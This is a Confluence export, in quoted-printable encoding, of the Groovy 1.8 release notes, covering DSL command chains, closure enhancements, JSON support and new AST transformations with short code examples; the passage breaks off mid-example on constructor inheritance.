capabilities. before that JS was a mistery, after that it became accessible. now I’m learning more and more “core” JS. :) The power if jQuery made me shout “Yay!” when I wanted to have my entire form div background color changed on focusing any of the inputs, and I was trying to do it with CSS (can’t happen) since I had more than one form in page. So then I used: since the div I wanted to apply color was 3rd parent of “this” input. Still I’m waiting for pure CSS solution to this. Still waiting for it. I still can’t quite wrap my head around the type of object-orientation that goes on in Javascript. I have no problem with Java, Python, PHP or even Lua-style OO, but JS just breaks my brain. I felt absolutely the same until I read Stefanov’s book (I like Crockford but he always makes is sound as if there is some hidden genius in JS). My Aha there was that in JS object-orientation is kinda left left up to you. It is just an implementation thing which you can use to achieve OO-like effects. If you come from languages with pointers think of JS objects as structures which always come with three pointers: constructor, prototype and __proto__. Now, when creating new instances point these pointers different places and you get different type of “inheritance” like. A very powerful and flexible mechanism – no question about it – but so easy to mess up too. And all of this could be done without any of the native supposedly OO elements of the language. I love it how even for prototypal inheritance (which is supposed to be native in JS) Crockford always has a currently favorite way of implementing it –. Or the only other native OO thing there – the “new” operator being considered harmful by some –? On the other hand partially this is what made beautiful things like jQuery possible… Understanding how information hiding can be achieved using function scopes. i found the importance of js and jquey while customizing iphonelu’s audio player and my daily routine adding onclick events for drop down menus on mobifreask’s free mobile website templates As others here have mentioned, for me it was watching and reading Crockford. When I read the history/background to the language it all made a lot more sense -I no longer felt frustrated and confused as I had been just by hacking at the language with a Java/C mindset. He explains: “JavaScript’s C-like syntax… makes it appear to be an ordinary procedural language. This is misleading because JavaScript has more in common with functional languages like Lisp or Scheme than with C or Java.” Apparently the language was named JavaScript as a marketing thing as Java was “it” at the time. Awfully confusing choice of name! Speaking of javascript, I get a js error when viewing this website in ie7. I think you’re missing or have an extra comma somewhere in your js. My biggest Javascript “Ah-ha moment” was when I found out that you have to define functions in AJAX callbacks so the newly loaded content can access your functions. My “Ah ha!” moment was the day that a friend told me about a new framework that was on development called jQuery. I have yet to experience my ‘aha’ moment for javascript in particular, but along a similar line is my ‘aha’ moment for Object-Oriented design in general. I was banging my head against the wall all evening trying to get some code working, and went to bed. I woke up in the middle of the night and thought to myself… “Wait! I get it!”. I realized that I had been stumbling through my code with some hodgepodge of procedural-OOP-spaghetti mess. I suddenly understood the whole concept of creating an object once and using anywhere throughout the site, or any of my sites for that matter. I knew what it meant to write a self-contained class that could be used wherever I needed it, across all of my projects. It was like a paradigm shift for me. It was a cool feeling. Had my “Ah ha!” when I realized that I can do jQuery, but no raw JavaScript. And I’m still not sure if this is a good or bad thing – but it works for me. I’m just the opposite. I know my way around jQuery, but unless a client demands it, I’d take vanilla Javascript over a library any day. Yes, I know the risks (browser inconsistencies mainly), but I have yet to see a decent library that actually encourages to use Javascript the way it’s meant to be used. My problem with them is more about the mentality behind them than the frameworks themselves. Javascript should not be used for animation or styling; one should use CSS. It shouldn’t be used for content generation or script loading; one should use a server-sided language or just HTML for that. Most important, a website should not rely on Javascript to function (except in special cases, such as Gmail or something similar). Worst of all, though the frameworks themselves are rarely that big, relying on them can quickly bloat a website. My company’s ‘mobile site’ had to load over a megabyte of JS libraries just to function, and it’s perceived loading time was 3 times longer than that of the desktop website. I guess what I’m saying is that it’s good to know the fundamentals, if possible. I wrote a very small and basic jQuery Truncate Function (). That was my Ah ha Moment; from that I started to get better and better in JS and jQuery. Still have a lot to learn but this definitely was the beginning of a good JS carreer for me :) First when I realised there are two ways to access object properties: Then when I realised the second type doesn’t even have to use a string: or maybe: or even: Careful there, the object you use within the brackets will be indexed using its string representation (toString() will be called), so if that turns out to be “object Object”, and you’re not aware of that, then you can end up with some unexpected collisions. Hmm, now that’s interesting, I didn’t know that, thanks :) When I discovered getElementsByTagName is a live collection For me it was the moment I discovered I can debug JavaScript in the Firebug console using debugger; Good Post! Here’s some tips on how one can evolve themselves in the field of web design: 1. Keep up to date with news through design blogs or perhaps learn a new web language. 2. There are many fantastic web design books and magazines out there covering a wide range of subjects with ever-increasing depth as a source of education. 3. Web resources like Six Revisions are great for learning new techniques. 4. Remember to verify anything you learn through a third party resource. There’s an awful lot of outdated information out there (like W3Schools) that could get rid of those bad habits. 5. Sites are beginning to teach classroom-style lessons and video-based instruction classes (e.g. Lynda.com) on web design and development. They can get pricey, but they will be best investments for your future. a-ha! numbers, boolean, strings etc.. a-ha! if else a-ha! for / while loops a-ha! functions, objects, methods until i will know the whole grammar of this language, there will be a few more a-ha moments. for me, the most important a-ha moments will be, when i realise what i can do with the DOM. for me, as i am not writing real computer programs, it will be most important what i can do to my webdesign with js. to do this things the best, cleanest and lightest way, i think its important to everyone to know how pure js works. a really good source to learn javascript is codeacademy which i am actually using. for me, there has never been an easier way to learn a web-related technology, so i can really recommend it to everyone. This thread is turning out to be an excellent tool for compiling a reading list as a jQuery/future plain JavaScript developer. The recurring themes cited by advanced JavaScript developers that took them to the next level are really inspiring me to learn, and giving me some great direction with which to do so. The moment when I realized the difference between thisand $(this). I wouldn’t claim I have a “decent understanding” of Javascript, or anything for that matter, but watching a series of talks by Douglas Crockford blew my mind. While my code is still a silly mess, at least know I know what sucks about it (to some degree at least), and more importantly I now can think stuff up and get it working in some shape or form without much pain — instead of at best modifying copypasta while having hardly any clue how and why it works, and at worst just having to pass. ^ they’re on youtube, too. If you’re like me, you might have a fever like reaction to it: unable to stop watching, while feeling the urge to put what you’re hearing to practice, which is a bit like needing to sneeze and pee at the same time. Best brain pain ever! Personally, I’m looking forward to watching them all again at some point in the future and actually being somewhat able to follow, that will be awesome as well. Hope this helped anyone, and thanks to Crockford either way. My ahha moment was picking up JQuery. I guess you could say I’m still waiting… When i use alert type validation and my sir told me to use better and stylish validation and it works in first time well its not like that ah ha so i’m still waiting Biggest Aha so far – we are stuck with it… (so better learn it) My ah-ha! moment was definitely when I grasped the concept of “this”, both in javascript and in php! It’s such a simple concept yet it can be so difficult to wrap your head around at first. Once I got that down, my programming life became a hell of a lot easier. I’m a professional or anything like that but I would say that moment came along when I figured out how to display data from other pages using JavaScript/jQuery after weeks of searching. My aha moment was when I learned the power and ease of truthy and falsey expressions in JS. No more “if (x == “” || x ==0 || typeof x == “undefined”)”, now I can just do “if (x)” #booyah jQuery aha! – Chaining and callback functions. Javascript aha! – How objects work and how to use them. – What is and how exactly the DOM works I am still waiting for a AH AH moment. I read tutorials, watched videos but I still can’t wrap my head around Jquery. I mean I can do the simple stuff like hide and slide this down but besides that I can’t go any further. I don’t know what it is…I don’t even know what an Object is! UGH. Sadness. Im in the same trouble here mate, I can seem to manage little things like slide, hide etc, but nothing else and I’m desperate about getting this ah haaa moment, I’m watching video tutorials, reading books, tryed code academy, but nothing seems to click for me ((( I asked about suggestion here but no one answered, please if anyone any shortcut or hint, tip, tutorial please post… Leo, Have you tried meeting up with others and trying to learn in a group setting? For me what’s helped me was deciding to take a course at a school to learn the basic fundamentals, which has really helped me get a better understanding of what’s going. Prior to this I had tried everything you described and nothing caught on. I think it comes down to knowing yourself and how you learn best. I still have a long way to go with lots of sleepless nights, but I’m setting a good foundation. Amazing similarity to all these moments when the ‘penny dropped’. It was exactly the same for me, I got to learn that everything was an object fairly early on… And then you think you’ve got it nailed, you start throwing stuff out there and bam! namespace conflicts with plugins or other bits of code – and you’re back to being humble once more… you learn about namespacing and closures and stuff… And then ‘this’ – you think what the hell is ‘this’, oh woe of man did it take me forever to ‘get’ this, or is it ‘get this’ or maybe get ‘this’, one thing for sure is when you do get this, you’ve got it. I’m still “getting” JS, but for me, the biggest “ah-ha” moments I’ve had were when I figured out how if/else statements work(just like PHP!), how to use console.log(), and that JS is essentially just variables and functions–in that order. I’m working toward my next ah-ha moment by diving into encapsulation :) For me its when I found the phpjs.org All the PHP functions converted to JavaScript…. I think Chris’s explanation of jQuery just gave me my jQuery aha moment. My ah-ha moment was the prototype in Javascript. I already knew the ‘everything is an object’ from my explorations of Ruby, so that made sense – it was the lack of classes that really broke Javascript in my head. Then I read Javascript: The Good Parts and he nails the prototypal nature of Javascript. That’s when something clicked in my head (I was reading about evolutionary theory at the time as well) and I put prototype with ‘last common ancestor’ and it really just clicked: Extend a class by finding the prototype object down the chain that should carry the extension, and diverge from there. Really, all of Javascript: TGP is one big ‘oh THAT’S how you do that’ moment. Objects scopes, “knowing what is *this* referring to at any time”, and the DOM event system, “learning that you can #addEventListener”. Anyway, I use CoffeeScript now, it really simplifies everything. In CoffeeScript something like this… Becomes this… And the most amazing thing, something like this… Can be written like this… Prototypical inheritance is probably one of the hardest concepts I had to wrap my head around, but once I realized how this paradigm worked. I always wanted Javascript to be clean and class-based, but the prototype chain was a new outlook on programming. Discovering jQuery to get away from that mess. I started learning JavaScript long time ago, it will be over 10 years now, way before I had my first Internet connection. The content from I was learning was a simple JavaScript web tutorial, zipped on a diskette, and a tutorial in a computer magazine. Because of that I was mostly discovering the language by myself, so there was many Aha! moments. My code then was a total mess (Whitespaces and new lines? Who needs that! The more code will fit your screen the better), but weirdly I completely knew what was going on there. I wasn’t using varstatements, because I didn’t see the difference between it and simply just using a variable. Later on I discovered, that the attributes in functions have strange ability not to be seen beyond function. So I starting using it like this: which with my current style of writing looked like this: Then I tried varagain. It was probably my biggest Aha! moment. My latest Aha! moment is about this: Yeah, comment a little bit TL;DRy, but I hope you liked it :) How does (object.method || function(){})(param);not work as expected? Perhaps your expectation was wrong, but that does do what you’re telling it to. (although it seems to favour anonymous functions, which are a poor substitute for functions which can be referenced by name). Well, as you can see from the second line, my expectation of this invocation’s effects was different. Maybe I didn’t express that clearly enough, I should have written “… as expected by me”. What do you mean by “poor substitute”? Performance issues? Well, performance wasn’t so important there so I wrote in a way that is easy understandable by me. I often use construction like (object.notSureIfThisPropertyWillExist || {}).foo, so I wanted to use something similar for methods. Maybe I should start using some global scoped noop function, but for now I don’t feel need for that. Anyhow I have chosen the third option (which is really the second one). But feel free to criticize my code/style/habits. I’d love to learn something more and therefore be a better programmer. Cheers. Well, no. I meant the statement (x || y)()is saying “call x, if it isn’t there then call y”. In your example x is a function on an object that you can call multiple times (that’s the point of public functions right?), but y is not. This problem is usually approached this way: if(!x) x = y;which says “if x isn’t there, then y is x” – That’s how most shims work. But that is not a shim. I don’t want to replace that nonexistent method with a noop. The role of this expression was rather something similar to a try statement (or @ in PHP). A try statement, which is considered rather slow and is advised to be used in the topmost scope (and I used it there), was just not so necessary here, because I can do checking with if or || or &&. You said: “In your example x is a function on an object that you can call multiple times (that’s the point of public functions right?), but y is not.”. P.S. I misclicked and that comment landed up to the main thread. Please ignore it. Sorry ^_^’ Oh, I now get where the confusion may come from. I showed a generalized example: I just wanted to call attention to calling a method. In reality that was looking a bit different: Now watching that from a different perspective it may look like I was trying to achieve something else. Nevertheless, that still might look confusing why I was even trying such an approach. But trust me, in context that suits much better than you think. Cheers. Excellent post. It’s incredible how many people go through the same experiences. I too had “Aha” moments. My first one was when I dicovered that jQuery is not some alien language and that it’s so easy to understand. But that is not a shim. I don’t want to replace that nonexistent method with a noop. The role of this expression was rather something similar to a trystatement (or @in PHP). A trystatement, which is considered rather slow and is advised to be used in the topmost scope (and I used it there), was just not so necessary here, because I can do checking with ifor ||or &&. You said:. That upper comment was meant to be a reply, I posted it above, so you can ignore or delete it (if you are able to). Sorry for inconvenience, my bad ^_^’ :) That’s the first time you mentioned no-op!!! I didn’t take your empty function literally, I thought that was for brevity. Yeah, I don’t see anything wrong with if(x) x();personally. I mean, compared to x && x(), that’s not a very nice thing to do for other developers who don’t have JavaScript as their first language. Mine would have to be learning how easy it is to do asynchronous xml/http request: —– var req = (window.XMLHttpRequest)?new XMLHttpRequest():new ActiveXObject(“Microsoft.XMLHTTP”); if(req == null) throw “Error!”; req.onload = function() {console.log(“Success!”);} try { req.open(“POST”, address, true); req.send(data); } catch(e) {throw “Error!”;} —– For the longest time, I thought AJAX was some amazing Javascript ‘thing’ that required advanced frameworks to implement. I also had another (somewhat perturbing) “aha” moment shortly after when I discovered that most libraries that use “AJAX” encourage to use it to inject raw HTML/Javascript into webpages (parse errors and security holes galore!). Mine was when I read that, while OOP adds behaviors (methods) on states, Javascript functional approach was just the inverse : allowing state into functions. The moment when I tried to create my own accordion script because I found the one in jQuery kind of hard to set up. And I didn’t even know how to code any Javascript, so that meant reading through the docs and learning the language.
https://css-tricks.com/the-javascript-ah-ha-moment/
CC-MAIN-2015-27
refinedweb
10,390
70.43
Message-ID: <753977829.1753.1416538356831.JavaMail.haus-conf@codehaus02.managed.contegix.com> Subject: Exported From Confluence MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_Part_1752_1740187646.1416538356831" ------=_Part_1752_1740187646.1416538356831 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Content-Location: Table of Contents=20 The 1.8 release of Groovy comes with many new features that greatly enha= nce=20 These features have undergone the Groovy developer process with formal d= escriptions, discussion, and voting (GEP - Groovy Enhancement Proposal) for= core parts and less formal developer discussions and JIRA voting for addit= ional parts.=20 Our goal has stayed the same, though: to give the Java developer a tool = that makes him more productive, allows him to achieve his goals faster and = with a smaller margin of error, and extend the scalability of the Java plat= form from full-blown enterprise projects to everyday "getting things d= one" tasks.=20 Thanks to its flexible syntax and its compile-time and runtime metaprogr= amming capabilities, Groovy is well known for its Domain-Specific Language = capabilities. However, we felt that we could improve upon the syntax furthe= r by removing additional punctuation symbols when users chain method calls.= This allows DSL implementors to develop command descriptions that read alm= ost like natural sentences.=20 Before Groovy 1.8, we could omit parentheses around the arguments of a m= ethod call for top-level statements. But we couldn't chain method calls. Th= e new "command chain" feature allows us to chain such parentheses= -free method calls, requiring neither parentheses around arguments, nor dot= s between the chained calls. The general idea is that a call like a b= c d will actually be equivalent to a(b).c(d). This als= o works with multiple arguments, closure arguments, and even named argument= s. Furthermore, such command chains can also appear on the right-hand side = of assignments. Let's have a look at some examples supported by this new sy= ntax: turn left then right // equivalent to: turn(left)= .then(right) take 2.pills of chloroquinine after 6.hours // equivalent to: take(2.pil= ls)({})=20 It is also possible to use methods in the chain which take no arguments,= but in that case, the parentheses are needed:=20 select all unique() from names // equivalent to: select(all= ).unique().from(names)=20 If your command chain contains an odd number of elements, the chain will= be composed of method / arguments, and will finish by a final property acc= ess:=20 take 3 cookies // equivalent to: take(3).co= okies // and also this: take(3).ge= tCookies()=20 This new command chain approach opens up interesting possibilities in te= rms of the much wider range of DSLs which can now be written in Groovy. Thi= s new feature has been developed thanks to the Google Summer of Code progra= m, where our student, Lidia, helped us modify the Groovy Antlr grammar to e= xtend top-level statements to accept that command chain syntax.=20 The above examples illustrate using a command chain based DSL but not ho= w to create one. You will be able to find some further = examples of "command chains" on the Groovy Web Console but to= illustrate creating such a DSL, we will show just a couple of examples - f= irst using maps and Closures:=20 show =3D { println it } square_root =3D { Math.sqrt(it) } def please(action) { [the: { what -> [of: { n -> action(what(n)) }] }] } please show the square_root of 100 // equivalent to: please(sho= w).the(square_root).of(100) // =3D=3D> 10.0=20 Or if you prefer Japanese and a metaprogramming style (see here for more details):=20 // Japanese DSL using GEP3 rules Object.metaClass.=E3=82=92 =3D Object.metaClass.=E3=81=AE =3D { clos -> clos(delega= te) } =E3=81=BE=E3=81=9A =3D { it } =E8=A1=A8=E7=A4=BA=E3=81=99=E3=82=8B =3D { println it } =E5=B9=B3=E6=96=B9=E6=A0=B9 =3D { Math.sqrt(it) } =E3=81=BE=E3=81=9A 100 =E3=81=AE =E5=B9=B3=E6=96=B9=E6=A0=B9= =E3=82=92 =E8=A1=A8=E7=A4=BA=E3=81=99=E3=82=8B // First, show t= he square root of 100 // =3D> 10.0=20 As a second example, consider how you might write a DSL for simplifying = one of your existing APIs. Maybe you need to put this code in front of cust= omers, business analysts or testers who might be not hard-core Java develop= ers. We'll use the Splitter from the Google Guava libraries project as it already has a nice Fluent API. Here is = how we might use it out of the box: @Grab('com.google.guava:guava:r09') import com.google.common.base.* def result =3D Splitter.on(',').trimResults(CharMatcher.is('_' as char)).sp= lit("_a ,_b_ ,c__").iterator().toList() assert result =3D=3D ['a ', 'b_ ', 'c']=20 It reads fairly well for a Java developer but if that is not your target= audience or you have many such statements to write, it could be considered= a little verbose. Again, there are many options for writing a DSL. We'll k= eep it simple with Maps and Closures. We'll first write a helper method:=20 def split(string) { [on: { sep -> [trimming: { trimChar -> Splitter.on(sep).trimResults(CharMatcher.is(trimChar as char)).split(= string).iterator().toList() }] }] }=20 now instead of this line from our original example:=20 def result =3D Splitter.on(',').trimResults(CharMatcher.is('_' as char)).sp= lit("_a ,_b_ ,c__").iterator().toList()=20 we can write this:=20 def result =3D split "_a ,_b_ ,c__" on ',' trimming '_'=20 Groovy's flexible metaprogramming model involves numerous decision point= s when making method calls or accessing properties to determine whether any= metaprogamming hooks are being utilized. During complex expression calcula= tions, such decision points involved identical checks being executed numero= us times. Recent performance improvements allow some of these checks to be = bypassed during an expression calculation once certain initial assumptions = have been checked. Basically if certain preconditions hold, some streamlini= ng can take place.=20 Groovy 1.8.0 contains two main streams of optimization work:=20 Those two areas of optimization are only the beginning of further simila= r improvements. Upcoming versions of the Groovy 1.8.x branch will see more = optimizations coming. In particular, primitive types other than integers sh= ould be expected to be supported shortly.=20 The GPars project offers developers new intuitive and safe ways = to handle Java or Groovy tasks concurrently, asynchronously, and distribute= d by utilizing the power of the Java platform and the flexibility of the Gr= oovy language. Groovy 1.8 now bundles GPars 0.11 in the libraries of the Gr= o).=20 Closures are a central and essential piece of the Groovy programming lan= guage and are used in various ways throughout the Groovy APIs. In Groovy 1.= 8, we introduce the ability to use closures as annotation parameters. Closu= res are also a key part of what gives Groovy its functional flavor.=20 In Java, there's a limited set of types you can use as annotation parame= ters (String, primitives, annotations, classes, and arrays of these). But i= n Groovy 1.8, we're going further and let you use closures as annotation pa= rameters =E2=80=93 which are actually transformed into a class parameter fo= r compatibility reasons.=20 import java.lang.annotation.* @Retention(RetentionPolicy.RUNTIME) @interface Invariant { Class value() // will hold a closure class } @Invariant({ number >=3D 0 }) class Distance { float number String unit } def d =3D new Distance(number: 10, unit: "meters") def anno =3D Distance.getAnnotation(Invariant) def check =3D anno.value().newInstance(d, d) assert check(d)=20 Closure annotation parameters open up some interesting possibilities for= framework authors! As an example, the GContr= acts project, which brings the "Design by Contract" paradigm = to Groovy makes heavy use of annotation parameters to allow preconditions, = postconditions and invariants to be declared.=20 If you recall your math lessons, function composition may be a concept y= ou're familiar with. And in turn, Closure composition is a= bout that: the ability to compose Closures together to form a new Closure w= hich chains the call of those Closures. Here's an example of composition in= action:=20 def plus2 =3D { it + 2 } def times3 =3D { it * 3 } def times3plus2 =3D plus2 << times3 assert times3plus2(3) =3D=3D 11 assert times3plus2(4) =3D=3D plus2(times3(4)) def plus2times3 =3D times3 << plus2 assert plus2times3(3) =3D=3D 15 assert plus2times3(5) =3D=3D times3(plus2(5)) // reverse composition assert times3plus2(3) =3D=3D (times3 >> plus2)(3)=20 To see more examples of Closure composition and reverse composition, ple= ase have a look at our test case.=20 When writing recursive algorithms, you may be getting the infamous stack= overflow exceptions, as the stack starts to have a too high depth of recur= sive calls. An approach that helps in those situations is by using Closures= and their new trampoline capabil= ity.=20 Closures are wrapped in a TrampolineClosure. Upon calling, = a trampolined Closure will call the original Closure waiting for its result= . If the outcome of the call is another instance of a TrampolineClosu= re, created perhaps as a result to a call to the trampoline()<= /code> method, the Closure will again be invoked. This repetitive invocatio= n of returned trampolined Closures instances will continue until a value ot= her than a trampolined Closure is returned. That value will become the fina= l result of the trampoline. That way, calls are made serially, rather than = filling the stack. Here's an example of the use of trampoline() to implement t= he factorial function: def factorial factorial =3D { int n, def accu =3D 1G -> if (n < 2) return accu factorial.trampoline(n - 1, n * accu) } factorial =3D factorial.trampoline() assert factorial(1) =3D=3D 1 assert factorial(3) =3D=3D 1 * 2 * 3 assert factorial(1000) =3D=3D 402387260... // plus another 2560 digits=20 Another improvement to Closures is the ability to mem= oize the outcome of previous (ideally side-effect free) invocations of = your Closures. The return values for a given set of Closure parameter value= s are kept in a cache, for those memoized Closures. That way, if you have a= n expensive computation to make that takes seconds, you can put the return = value in cache, so that the next execution with the same parameter will ret= urn the same result =E2=80=93 again, we assume results of an invocation are= the same given the same set of parameter values.=20 There are three forms of memoize functions:=20 memoize()which caches all the invocations=20 memoizeAtMost(max)call which caches a maximum number of i= nvocations memoizeAtLeast(min)call which keeps at least a certain nu= mber of invocation results memoizeBetween(min, max)which keeps a range results (= between a minimum and a maximum) Let's illustrate that:=20 def plus =3D { a, b -> sleep 1000; a + b }.memoize() assert plus(1, 2) =3D=3D 3 // after 1000ms assert plus(1, 2) =3D=3D 3 // return immediately assert plus(2, 2) =3D=3D 4 // after 1000ms assert plus(2, 2) =3D=3D 4 // return immediately // other forms: // at least 10 invocations cached def plusAtLeast =3D { ... }.memoizeAtLeast(10) // at most 10 invocations cached def plusAtMost =3D { ... }.memoizeAtMost(10) // between 10 and 20 invocations cached def plusAtLeast =3D { ... }.memoizeBetween(10, 20)=20 Currying improvements have also been backported to recent releases of Gr= oovy 1.7, but it's worth outlining here for reference. Currying used to be = done only from left to right, but it's also possible to do it from right to= left, or from a given index, as the following examples demonstrate:=20 // right currying def divide =3D { a, b -> a / b } def halver =3D divide.rcurry(2) assert halver(8) =3D=3D 4 // currying n-th parameter def joinWithSeparator =3D { one, sep, two -> one + sep + two } def joinWithComma =3D joinWithSeparator.ncurry(1, ', ') assert joinWithComma('a', 'b') =3D=3D 'a, b'=20 With the ubiquity of JSON as an interchange format for our applications,= it is natural that Groovy added support for JSON, in a similar fashion as = the support Groovy's always had with XML. So Groovy 1.8 introduces a JSON b= uilder and parser.=20 A JsonSlurper class allows you to parse JSON payloads, and = access the nested Map and List data structures representing that content. J= SON objects and arrays are indeed simply represented as Maps and Lists, giv= ing you access to all the GPath expression benefits (subscript/property not= ation, find/findAll/each/inject/groupBy/etc.). Here's an example showing ho= w to find all the recent commit messages on the Grails project: import groovy.json.* def payload =3D new URL(" ails/grails-core/master").text def slurper =3D new JsonSlurper() def doc =3D slurper.parseText(payload) doc.commits.message.each { println it }=20 If you want to see some more examples of the usage of the JSON parser, y= ou can have a look at the JsonSlurper tests in our code base.=20 Parsing JSON data structures is one thing, but we should also be able to= produce JSON content just like we create markup with the MarkupBuild= er. The following example: import groovy.json.* def json =3D new JsonBuilder() json.person { name "Guillaume" age 33 pets "Hector", "Felix" } println json.toString()=20 Will create the JSON output:=20 {"person":{"name":"Guillaume","age"= :33,"pets":["Hector","Felix"]}}=20 You can find some more usages of the JSON builder in our JsonBuilder tes= ts.=20 When given a JSON data structure, you may wish to pretty-print it, so th= at you can more easily inspect it, with a more friendly layout. So for inst= ance, if you want to pretty print the result of the previous example, you c= ould do:=20 import groovy.json.* println JsonOutput.prettyPrint('''{"person":{"name":&qu= ot;Guillaume","age":33,"pets":["Hector",= "Felix"]}}''')=20 Which would result in the following pretty-printed output:=20 { "person": { "name": "Guillaume", "age": 33, "pets": [ "Hector", "Felix" ] } }=20 The Groovy compiler reads the source code, builds an Abstract Syntax Tre= e (AST) from it, and then puts the AST into bytecode. With AST transformati= ons, the programmer can hook into this process. A general description of th= is process, an exhaustive description of all available transformations, and= a guide of how to write you own ones can be found for example in Groovy in Action, 2nd Edition (MEAP), chapter 9.=20 Below is a list of all new transformations that come with Groovy 1.8. Th= ey save you from writing repetitive code and help avoiding common errors.= p>=20 You can annotate your classes with the @Log transformation to automatica= lly inject a logger in your Groovy classes, under the log prop= erty. Four kind of loggers are actually available: @Logfor java.util.logging @Commonsfor Commons-Logging @Log4jfor Log4J @Slf4jfor SLF4J Here's a sample usage of the @Log transformation:=20 When defining variables in a script, those variables are actually local = to the script's run method, so they are not accessible from other methods o= f the script. A usual approach to that problem has been to store variables = in the binding, by not def'ining those variables and by just assigning them= a value. Fortunately, the @Field transformation provides a be= tter alternative: by annotating your variables in your script with this ann= otation, the annotated variable will become a private field of the script c= lass. More concretely, you'll be able to do as follows:=20 @Field List awe =3D [1, 2, 3] def awesum() { awe.sum() } assert awesum() =3D=3D 6=20 The @PackageScope annotation can be placed on classes, methods or fields= and is used for turning off Groovy's visibility conventions and reverting = back to Java conventions. This ability is usually only needed when using 3r= d party libraries which rely on the package scope visibility. When adding t= he @PackageScope annotation to a field, Groovy will assign pac= kage scope access to the field rather than automatically treating it as a p= roperty (and adding setters/getters). Annotating a class or method with The @AutoClone annotation is placed on classes which you wa= nt to be Cloneable. The annotation instructs the compiler to e= xecute an AST transformation which adds a public clone() metho= d and adds Cloneable to the classes implements list of interfa= ces. Because the JVM doesn't have a one-size-fits-all cloning strategy, sev= eral customizations exist for the cloning implementation: clone()method will call super.clone= ()before calling clone()on each Cloneableproperty of the class. Example usage:=20 import groovy.transform.AutoClone @AutoClone class Person { String first, last List favItems Date since }=20 class Person implements Cloneable { ... public Object clone() throws CloneNotSupportedException { Object result =3D super.clone() result.favItems =3D favItems.clone() result.since =3D since.clone() return result } ... }=20 finaland Cloneable= you should set style=3DCOPY_CONSTRUCTORwhich will then use t= he copy constructor pattern. Seri= alizableor Externalizableinterface, you might like to= set style=3DSERIALIZATIONwhich will then use serialization t= o do the cloning. See the Javadoc for AutoClone for further details. The @AutoExternalizable class annotation is used to assist = in the creation of Externalizable classes. The annotation inst= ructs the compiler to execute an AST transformation which adds writeE= xternal() and readExternal() methods to a class and add= s Externalizable to the interfaces which the class implements.= The writeExternal() method writes each property (or field) fo= r the class while the readExternal() method will read each one= back in the same order. Properties or fields marked as transient are ignored. Example usage: import groovy.transform.* @AutoExternalize class Person { String first, last List favItems Date since }=20 Which will create a class of the following form:=20 class Person implements Externalizable { ... void writeExternal(ObjectOutput out) throws IOException { out.writeObject(first) out.writeObject(last) out.writeObject(favItems) out.writeObject(since) } void readExternal(ObjectInput oin) { first =3D oin.readObject() last =3D oin.readObject() favItems =3D oin.readObject() since =3D oin.readObject() } ... }=20 When integrating user-provided Groovy scripts and classes in your Java a= pplication, e= xecution when the thread is interrupted, when a certain duration has elapse= d, or when a certain condition is met (lack of resources, etc). Groovy 1.8 introduces three transformations for those purposes, as we sh= all see in the following sections. By default, the three transformations ad= d some checks in at the beginning of each method body, and each closure bod= y, to check whether a condition of interruption is met or not.=20 Note that those transformations are local (triggered by an annotation). = If you want to apply them transparently, so that the annotation doesn't sho= w up, I encourage you to have a look at the ASTTransformationCustomiz= er explained at the end of this article. Cédric Champeau, our most recent Groovy committer, who implemente= d those features, has a very nice blog post covering those code interruption transformation= s.=20 You don't need to write checks in your scripts for whether the current t= hread of execution has been interrupted or not, by default, the transformat= ion will add those checks for you for scripts and classes, at the beginning= of each method body and closure body:=20 @ThreadInterrupt import groovy.transform.ThreadInterrupt while (true) { // eat lots of CPU }=20 You can specify a checkOnMethodStart annotation parameter (= defaults to true) to customize where checks are added by the transformation= (adds an interrupt check by default as the first statement of a method bod= y). And you can also specify the applyToAllClasses annotation = parameter (default to true) if you want to specify whether only the current= class or script should have this interruption logic applied or not. With @TimedInterrupt, you can interrupt the script after a = certain amount of time: @TimedInterrupt(10) import groovy.transform.TimedInterrupt while (true) { // eat lots of CPU }=20 In addition to the previous annotation parameters we mentioned for @ThreadInterrupt, you should specify value, the amount= of time to wait, and unit (defaulting to TimeUnit.SECON= DS) to specify the unit of time to be used. An example of @ConditionalInterrupt which leverages the clo= sure annotation parameter feature, and the @Field transformati= on as well: @ConditionalInterrupt({ counter++ > 2 }) import groovy.transform.ConditionalInterrupt import groovy.transform.Field @Field int counter =3D 0 100.times { println 'executing script method...' }=20 You can imagine defining any kind of condition: on counters, on resource= availability, on resource usage, and more.=20 Provides your classes with a default toString() method whic= h prints out the values of the class' properties (and optionally the proper= ty names and optionally fields). A basic example is here: import groovy.transform.ToString @ToString class Person { String name int age } println new Person(name: 'Pete', age: 15) // =3D> Person(Pete, 15)=20 And here's another example using a few more options:=20 @ToString(includeNames =3D true, includeFields =3D true) class Coord { int x, y private z =3D 0 } println new Coord(x:20, y:5) // =3D> Coord(x:20, y:5, z:0)=20 Provides your classes with equals() and hashCode() methods based on the values of the class' properties (and optionally f= ields and optionally super class values for equals() and hashCode()). import groovy.transform.EqualsAndHashCode @EqualsAndHashCode class Coord { int x, y } def c1 =3D new Coord(x:20, y:5) def c2 =3D new Coord(x:20, y:5) assert c1 =3D=3D c2 assert c1.hashCode() =3D=3D c2.hashCode()=20 Provides a tuple (ordered) constructor. For POGOs (plain old Groovy obje= cts), this will be in addition to Groovy's default "named-arg" co= nstructor.=20 import groovy.transform.TupleConstructor @TupleConstructor class Person { String name int age } def p1 =3D new Person(name: 'Pete', age: 15) // map-based def p2 =3D new Person('Pete', 15) // tuple-based assert p1.name =3D=3D p2.name assert p1.age =3D=3D p2.age=20 Allows you to combine @ToString, @EqualsAndHashCode= code> and @TupleConstructor. For those familiar with Groovy's = @Immutable transform, this provides similar features but for m= utable objects. import groovy.transform.Canonical @Canonical class Person { String name int age } def p1 =3D new Person(name: 'Pete', age: 15) def p2 =3D new Person('Paul', 15) p2.name =3D 'Pete' println "${p1.equals(p2)} $p1 $p2" // =3D> true Person(Pete, 15) Person(Pete, 15)=20 By default, @Canonical gives you vanilla versions for each = of the combined annotations. If you want to use any of the special features= that the individual annotations give you, simply include the individual an= notation as well. import groovy.transform.* @Canonical @ToString(includeNames =3D true) class Person { String name int age } def p =3D new Person(name: 'Pete', age: 15) println p // =3D> Person(name:Pete, age:15)=20 You will find a great write-up on @Canonical, @ToString, @EqualsAndHashCode and @TupleCons= tructor on John Prystash's weblog.=20 Sometimes, when you want to subclass certain classes, you also need to o= verride all the constructors of the parent, even if only to call the super = constructor. Such a case happens for instance when you define your own exce= ptions, you want your exceptions to also have the constructors taking messa= ges and throwable as parameters. But instead of writing this kind of boiler= plate code each time for your exceptions:=20 class CustomException extends Exception { CustomException() { super() } CustomException(String msg) { super(msg) } CustomException(String msg, Throwable t) 